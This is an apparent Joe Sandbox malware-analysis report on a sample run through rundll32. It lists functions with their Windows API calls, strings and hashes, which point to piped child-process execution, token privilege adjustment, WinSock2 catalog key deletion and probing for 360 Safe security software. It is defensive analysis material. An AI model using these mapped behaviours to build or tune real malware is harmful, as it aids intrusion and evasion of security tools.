Download Yara Rule

APIs

CreatePipe.KERNEL32 ref: 00000235B5CE10FF
SetHandleInformation.KERNEL32 ref: 00000235B5CE1119
CreatePipe.KERNEL32 ref: 00000235B5CE113A
SetHandleInformation.KERNEL32 ref: 00000235B5CE1154
CreatePipe.KERNEL32 ref: 00000235B5CE1175
SetHandleInformation.KERNEL32 ref: 00000235B5CE118F
CreateProcessW.KERNEL32 ref: 00000235B5CE1251

Part of subcall function 00000235B5CEAD34: NtAllocateVirtualMemory.NTDLL ref: 00000235B5CEAD6A

PeekNamedPipe.KERNEL32 ref: 00000235B5CE1300
ReadFile.KERNEL32 ref: 00000235B5CE135C
PeekNamedPipe.KERNEL32 ref: 00000235B5CE13B0
ReadFile.KERNEL32 ref: 00000235B5CE140C
GetExitCodeProcess.KERNEL32 ref: 00000235B5CE1445
TerminateProcess.KERNEL32 ref: 00000235B5CE1476
CloseHandle.KERNEL32 ref: 00000235B5CE1484

Part of subcall function 00000235B5CECB54: NtDelayExecution.NTDLL ref: 00000235B5CECB76

CloseHandle.KERNEL32 ref: 00000235B5CE1492
CloseHandle.KERNEL32 ref: 00000235B5CE14A0
CloseHandle.KERNEL32 ref: 00000235B5CE14AE

Part of subcall function 00000235B5CE7B40: NtFreeVirtualMemory.NTDLL ref: 00000235B5CE7B71

Strings

h, xrefs: 00000235B5CE1195

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
String ID: h
API String ID: 30365702-2439710439
Opcode ID: eb7bea1748a89db5f07d023bcdb676065683870e413be2d4ad1df109deaa66ff
Instruction ID: caebef695c7c9040f76a4fd920a0631a43247340c8c19d345880b31cfc21d30a
Opcode Fuzzy Hash: eb7bea1748a89db5f07d023bcdb676065683870e413be2d4ad1df109deaa66ff
Instruction Fuzzy Hash: 45C1C236208BD08AE7A4DB65E45879AF7A2F3C4748F405525EA8D83A68DFBCD54CCF40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060578 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 289registrywindowtimeCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 000000018006062B
FindWindowW.USER32 ref: 000000018006067B
IsWindow.USER32 ref: 0000000180060690
memset.MSVCRT ref: 00000001800606C2
SendMessageTimeoutW.USER32 ref: 0000000180060722
SendMessageTimeoutW.USER32 ref: 0000000180060767
RegOpenKeyExW.ADVAPI32 ref: 00000001800607BF
memset.MSVCRT ref: 00000001800607DE
RegQueryValueExW.ADVAPI32 ref: 0000000180060825
memset.MSVCRT ref: 00000001800608E0
RegQueryValueExW.ADVAPI32 ref: 0000000180060918

Part of subcall function 0000000180016DD4: memmove.MSVCRT(?,?,?,?,?,?,?,0000000180016E29), ref: 0000000180016E10

RegCloseKey.ADVAPI32 ref: 00000001800609B9

Strings

TS2P, xrefs: 0000000180060713
activeweb, xrefs: 000000018006090C
Q360SafeMonClass, xrefs: 0000000180060674
MsgCenter, xrefs: 000000018006078E
activeapp, xrefs: 0000000180060819

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Windowmemset$MessageQuerySendTimeoutValue$CloseFindForegroundOpenmemmove
String ID: MsgCenter$Q360SafeMonClass$TS2P$activeapp$activeweb
API String ID: 3772276521-2728888700
Opcode ID: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
Instruction ID: ee8cae4e48a5beadbc07239537d79e19b069e47090ef93ff609d4821bf219365
Opcode Fuzzy Hash: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
Instruction Fuzzy Hash: C1D19172604B4886EB51DF25E8403DE7761F789BE8F608215EAAD43BE5DF38C649CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018007E7C7 Relevance: 28.7, APIs: 16, Strings: 3, Instructions: 248COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 000000018007EB4B
free.MSVCRT ref: 000000018007EB57
free.MSVCRT ref: 000000018007EB62
memset.MSVCRT ref: 000000018007EBC2
calloc.MSVCRT ref: 000000018007EC04
free.MSVCRT ref: 000000018007EC10
free.MSVCRT ref: 000000018007EC1B
calloc.MSVCRT ref: 000000018007ECB8
free.MSVCRT ref: 000000018007ECC4
free.MSVCRT ref: 000000018007ECCF
calloc.MSVCRT ref: 000000018007ED0B
free.MSVCRT ref: 000000018007ED17
free.MSVCRT ref: 000000018007ED22
calloc.MSVCRT ref: 000000018007EDC9
free.MSVCRT ref: 000000018007EDD5
free.MSVCRT ref: 000000018007EDE0

Strings

], xrefs: 000000018007EC39
], xrefs: 000000018007ED55
-, xrefs: 000000018007EC59

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: free$calloc$memset
String ID: -$]$]
API String ID: 2591755499-1349866957
Opcode ID: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
Instruction ID: 1d85a50f400dc416e5d0a718f77556582d5ce19bdf984b68484f18af02043cc0
Opcode Fuzzy Hash: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
Instruction Fuzzy Hash: BCA1D272706BC892EB96CB16D0403A977A1F74D780F449616EB8A17B81DF39D2B9D300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005D014 Relevance: 28.4, APIs: 8, Strings: 8, Instructions: 422timesynchronizationCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 000000018005D0CB
SystemTimeToFileTime.KERNEL32 ref: 000000018005D0D9
??3@YAXPEAX@Z.MSVCRT ref: 000000018005D46D
free.MSVCRT ref: 000000018005D489
??3@YAXPEAX@Z.MSVCRT ref: 000000018005D597
free.MSVCRT ref: 000000018005D5B3
free.MSVCRT ref: 000000018005D5CB
ReleaseMutex.KERNEL32 ref: 000000018005D600

Strings

TimeStamp < %I64d;, xrefs: 000000018005D846
TYPE = %d, xrefs: 000000018005D76E
SLEV = %d , xrefs: 000000018005D7BB
ModName LIKE ', xrefs: 000000018005D6E2
AND , xrefs: 000000018005D73B
WHERE , xrefs: 000000018005D944
INSERT INTO "MT" VALUES ( ?,?,?,?,?,?,?,?,?,?,?,?,NULL ) , xrefs: 000000018005D09E
DELETE FROM 'MT' , xrefs: 000000018005D909

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Timefree$??3@System$FileMutexRelease
String ID: AND $ SLEV = %d $ TYPE = %d$ WHERE $DELETE FROM 'MT' $INSERT INTO "MT" VALUES ( ?,?,?,?,?,?,?,?,?,?,?,?,NULL ) $ModName LIKE '$TimeStamp < %I64d;
API String ID: 2360919559-3261407791
Opcode ID: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
Instruction ID: fbbc87ecfbf22c2b8803d4662eccf4799cfebf60f86054df91e993a66dbd8da4
Opcode Fuzzy Hash: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
Instruction Fuzzy Hash: B102B332711A4C85FFB29BA5D4403DD2361AB887D8F148627BE2E6B7D4DE3AC649C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180052FD8 Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 303registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000018005303F
LeaveCriticalSection.KERNEL32 ref: 0000000180053088
RegOpenKeyExW.ADVAPI32 ref: 0000000180053228
RegDeleteKeyW.ADVAPI32 ref: 0000000180053296
RegCloseKey.ADVAPI32 ref: 00000001800532E1

Part of subcall function 00000001800432C8: memset.MSVCRT ref: 0000000180043335

Strings

Catalog_Entries64, xrefs: 00000001800530B6
Num_Catalog_Entries, xrefs: 00000001800530A9
NameSpace_Catalog5, xrefs: 00000001800533D8
%s\%s, xrefs: 0000000180053267
Num_Catalog_Entries64, xrefs: 00000001800530A2
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s, xrefs: 00000001800531D2
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s\%012d, xrefs: 0000000180053359
Catalog_Entries, xrefs: 00000001800530BD

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$CloseDeleteEnterLeaveOpenmemset
String ID: %s\%s$Catalog_Entries$Catalog_Entries64$NameSpace_Catalog5$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s\%012d
API String ID: 2413450229-732542554
Opcode ID: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
Instruction ID: 3ab1713314ff84c9548747a70e29f101a91a5434d94fe8d6158548384223fcd6
Opcode Fuzzy Hash: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
Instruction Fuzzy Hash: 69C1DEB1701A4D82EEA6DB29E8457D963A0F788BD4F04C422FE0D1B7A5DF39C64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000834C Relevance: 19.8, APIs: 13, Instructions: 336stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CA7
Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CD3
Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008D81

lstrcmpiW.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000), ref: 00000001800083C8
lstrcmpiW.KERNEL32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800083E6
CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008457
CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008541
CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 000000018000855D
RegSetValueExW.ADVAPI32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800085C2

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CharNext$lstrcmpi$Value
String ID:
API String ID: 3520330261-0
Opcode ID: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
Instruction ID: 54a0f5542f62afcd6411b2081a4c08be2fbbe8d603b0a409542dd15f8ed12d0a
Opcode Fuzzy Hash: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
Instruction Fuzzy Hash: D3D1643260864982FBA2DB15E8543DA76E1FB9C7D0F91C121BA99476E4EF38C74DD700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060174 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 270COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800601FC
SHGetValueW.SHLWAPI ref: 0000000180060257
_wtoi.MSVCRT ref: 000000018006029F
_wtoi.MSVCRT ref: 00000001800602B1
_wtoi.MSVCRT ref: 00000001800602C3
_wtoi.MSVCRT ref: 00000001800602D5
SHSetValueW.SHLWAPI ref: 0000000180060468
??3@YAXPEAX@Z.MSVCRT ref: 000000018006050C

Strings

MontiorInfo, xrefs: 0000000180060244, 0000000180060455
%d|%d|%d|%d, xrefs: 0000000180060404
MsgCenter, xrefs: 000000018006021A, 000000018006042C, 0000000180060436

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _wtoi$Value$??3@memset
String ID: %d|%d|%d|%d$MontiorInfo$MsgCenter
API String ID: 1219333133-3184008533
Opcode ID: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
Instruction ID: 3a97e8b4d36ab7b0ff62b7c8c746816c118d75ce1dcaba847e92933311b9e76e
Opcode Fuzzy Hash: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
Instruction Fuzzy Hash: FDC1B472604B4887EB51CF29E84039E77A1F789BA4F208216FAAD577A4DF78D644CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040CB0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 0000000180040CEF
memset.MSVCRT ref: 0000000180040D0A
SHGetValueW.SHLWAPI ref: 0000000180040D49
atoi.MSVCRT ref: 0000000180040D70
GetVersion.KERNEL32 ref: 0000000180040D80
GetModuleHandleW.KERNEL32 ref: 0000000180040DD0
GetProcAddress.KERNEL32 ref: 0000000180040DE0

Strings

RtlGetVersion, xrefs: 0000000180040DD9
CurrentVersion, xrefs: 0000000180040D34
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0000000180040D3B
ntdll.dll, xrefs: 0000000180040DC9

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Version$AddressHandleModuleProcValueatoimemset
String ID: CurrentVersion$RtlGetVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
API String ID: 1009632096-1820686997
Opcode ID: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
Instruction ID: 603b8f84a57364ab934b969a098bbde4f8155cf87e7eb2653b8acdc6aa15b94a
Opcode Fuzzy Hash: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
Instruction Fuzzy Hash: 0F416D31615A498AF792CF20EC883DB77A0F78C7A5F918115F56A426A8DF3CD24CCB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE7FA8 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 202COMMON

Download Yara Rule

APIs

Part of subcall function 00000235B5CEAD34: NtAllocateVirtualMemory.NTDLL ref: 00000235B5CEAD6A

GetAdaptersInfo.IPHLPAPI ref: 00000235B5CE7FF4
GetAdaptersInfo.IPHLPAPI ref: 00000235B5CE802B
wsprintfA.USER32 ref: 00000235B5CE8074
wsprintfA.USER32 ref: 00000235B5CE815F
wsprintfA.USER32 ref: 00000235B5CE81C3

Strings

o, xrefs: 00000235B5CE8006

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
String ID: o
API String ID: 2074107575-252678980
Opcode ID: 78c1bf18890002bbd55230ae8bdd6788f42dae7e011ee9be3a01caf660352b1c
Instruction ID: d1d3e2bf902fc2d3549d6580f787ad415931266dd6b6ce8750c4aafb70f798b9
Opcode Fuzzy Hash: 78c1bf18890002bbd55230ae8bdd6788f42dae7e011ee9be3a01caf660352b1c
Instruction Fuzzy Hash: 62B10D32249F908ADBA5CB14F45835AF7A2F788788F500925EA8E43B5DDF7CD649CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800647B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180064800

Part of subcall function 0000000180035E24: ??2@YAPEAX_K@Z.MSVCRT ref: 0000000180035ED4
Part of subcall function 0000000180035E24: memmove.MSVCRT ref: 0000000180035F42
Part of subcall function 0000000180035E24: ??3@YAXPEAX@Z.MSVCRT ref: 0000000180035F7C

??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800648B2
SysFreeString.OLEAUT32 ref: 0000000180064941
SysAllocString.OLEAUT32 ref: 000000018006495E
GetFileAttributesW.KERNEL32 ref: 0000000180064BC3
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180064D1C
??3@YAXPEAX@Z.MSVCRT ref: 0000000180064D8E
LeaveCriticalSection.KERNEL32 ref: 0000000180064DAC

Strings

360util, xrefs: 00000001800649C6, 0000000180064C35

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@CriticalSectionString$??2@AllocAttributesEnterFileFreeLeavememmove
String ID: 360util
API String ID: 2488163691-2294763832
Opcode ID: ba9b85f3e8219bbad665a1013a4ecfff85fbfd5e77b065d066760422abbecf22
Instruction ID: 9938724ed40c23cc8900e9648d175c046ed33f6fe674e618e7d9782a5817fc1c
Opcode Fuzzy Hash: ba9b85f3e8219bbad665a1013a4ecfff85fbfd5e77b065d066760422abbecf22
Instruction Fuzzy Hash: AE029C73B01B488AEB91CB64D8443DD33A6FB48798F519226EE592BB94DF38C619C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070760 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000000018007078B
memset.MSVCRT ref: 00000001800707E0
RtlCaptureContext.KERNEL32 ref: 00000001800707FC
RtlLookupFunctionEntry.KERNEL32 ref: 0000000180070814
RtlVirtualUnwind.KERNEL32 ref: 0000000180070852
IsDebuggerPresent.KERNEL32 ref: 0000000180070893
SetUnhandledExceptionFilter.KERNEL32 ref: 000000018007089D
UnhandledExceptionFilter.KERNEL32 ref: 00000001800708A8
GetCurrentProcess.KERNEL32 ref: 00000001800708BE
TerminateProcess.KERNEL32 ref: 00000001800708CC

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterPresentProcessUnhandled$CaptureContextCurrentDebuggerEntryFeatureFunctionLookupProcessorTerminateUnwindVirtualmemset
String ID:
API String ID: 2775880128-0
Opcode ID: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
Instruction ID: 97518c6b28749f0b1885d3d6b1dd33bd68934808d59c248e1302251445d11ba7
Opcode Fuzzy Hash: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
Instruction Fuzzy Hash: 1E413032A14B858AE751CF60EC503ED7360F799788F119229EA9D46B69EF78C398C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180049050 Relevance: 15.1, APIs: 10, Instructions: 70COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0000000180049077
GetCurrentProcess.KERNEL32 ref: 0000000180049085
OpenProcessToken.ADVAPI32 ref: 000000018004909B
LookupPrivilegeValueW.ADVAPI32 ref: 00000001800490B4
SetLastError.KERNEL32 ref: 00000001800490DA
AdjustTokenPrivileges.ADVAPI32 ref: 00000001800490FA
GetLastError.KERNEL32 ref: 0000000180049104
CloseHandle.KERNEL32 ref: 0000000180049117
CloseHandle.KERNEL32 ref: 0000000180049120
OpenProcess.KERNEL32 ref: 000000018004914F

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Process$CloseCurrentErrorHandleLastOpenToken$AdjustLookupPrivilegePrivilegesValue
String ID:
API String ID: 2007143780-0
Opcode ID: 6a90cf9bb053f436ae0415ad8c3242d222e7ab952c09d034660e141397cb4a9e
Instruction ID: d46f0c18e1a39d64aeb05f722a7361000aff992e322ccff9c5dcc36b437ee35a
Opcode Fuzzy Hash: 6a90cf9bb053f436ae0415ad8c3242d222e7ab952c09d034660e141397cb4a9e
Instruction Fuzzy Hash: 2E218032604B4982EB919F61E8583DA63A1FB8CBD5F458035FA9E47B64DF3CC6498B04

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017FE8 Relevance: 13.8, APIs: 9, Instructions: 322COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000180018020
memmove.MSVCRT ref: 0000000180018188
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800181E8
??_V@YAXPEAX@Z.MSVCRT ref: 000000018001820A
??3@YAXPEAX@Z.MSVCRT ref: 000000018001824D

Part of subcall function 0000000180044250: EnterCriticalSection.KERNEL32 ref: 0000000180044280
Part of subcall function 0000000180044250: LeaveCriticalSection.KERNEL32 ref: 00000001800442BA

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018278
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800182AD
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800182D5
??_V@YAXPEAX@Z.MSVCRT ref: 000000018001845E

Part of subcall function 00000001800429F4: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042AAA

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$??3@CountEnterLeaveTickmemmove
String ID:
API String ID: 1944083165-0
Opcode ID: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
Instruction ID: f41da155b52ef09f3583e4d9bfd8bf17b476c2db053c24b9ffbabfba65fc2eed
Opcode Fuzzy Hash: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
Instruction Fuzzy Hash: 37E15932B01F449AEB92CFA1E8403DD33B6F748798F148125EE5967B98DE34C65AD344

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A994 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018006A9D6

Part of subcall function 000000018006BD58: GetFileSizeEx.KERNEL32(?,?,?,?,000000018006A9EB,?,?,?,?,?,?,?,?,?,?,00000003), ref: 000000018006BD5C
Part of subcall function 000000018006BD58: _swprintf_c_l.LIBCMT ref: 000000018006BD74

Part of subcall function 000000018006A2B8: malloc.MSVCRT(?,?,?,0000000180069638), ref: 000000018006DF0A
Part of subcall function 000000018006A2B8: SetLastError.KERNEL32(?,?,?,0000000180069638), ref: 000000018006DF1B

